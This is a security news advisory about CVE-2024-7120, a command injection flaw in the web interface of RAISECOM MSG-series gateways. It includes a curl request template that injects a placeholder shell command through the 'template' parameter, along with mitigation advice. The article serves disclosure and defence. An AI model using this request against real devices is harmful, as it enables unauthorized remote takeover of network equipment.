RAISECOM Gateways Exposed: Remote Command Execution Flaw Impacts 25,000+ Devices

Security researchers have identified a vulnerability, tracked as CVE-2024-7120, in RAISECOM Gateway devices, exposing over 25,000 devices worldwide to potential remote attacks. The flaw, a command injection vulnerability, resides in the list_base_config.php script of the web interface, allowing attackers to execute arbitrary commands on the affected devices.

Vulnerable Devices

The vulnerability impacts RAISECOM Gateway models MSG1200, MSG2100E, MSG2200, and MSG2300 running software version 3.90.

Exploit and Impact

Attackers can exploit the CVE-2024-7120 vulnerability by sending a specially crafted HTTP GET request to the web interface, injecting malicious commands through the ‘template’ parameter.

curl 'http://<TARGET_IP>/vpn/list_base_config.php?type=mod&parts=base_config&template=`<INJECTED_SHELL_COMMAND>`' \
  -H 'Accept: */*' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Connection: keep-alive'

Successful exploitation could lead to complete compromise of the device, enabling attackers to steal sensitive data, disrupt network operations, or even install malware for further attacks.

Mitigation

RAISECOM has not yet released a patch for this vulnerability. In the interim, users are strongly advised to take the following measures to mitigate the risk:

1. Restrict Access: Limit access to the device’s web interface to trusted networks and authorized personnel.
2. Input Validation: Implement strict input validation and sanitization procedures on the web interface to prevent malicious code injection.
3. Monitoring: Closely monitor network traffic and device logs for any suspicious activity.

Recommendations

Organizations using RAISECOM Gateway devices are urged to take immediate action to protect their systems. In addition to the mitigation steps above, consider the following best practices:

• Security Patching: Keep all software and firmware up to date with the latest security patches.
• Firewall Protection: Deploy a firewall to restrict incoming traffic to only necessary ports and services.
• Intrusion Detection: Utilize intrusion detection and prevention systems (IDS/IPS) to monitor for and block malicious activity.
• Incident Response Plan: Have a well-defined incident response plan in place to quickly address any security breaches.

Related Posts:

• Trend Micro Linux-based Email Encryption Gateway exist multiple security vulnerabilities
• CISA Warns of Actively Exploited Linux Kernel and Check Point Gateway Vulnerabilities
• Critical Vulnerabilities Discovered in Ivanti Connect Secure and Policy Secure
• Critical Citrix Vulnerabilities Expose Sensitive Data, Cause DoS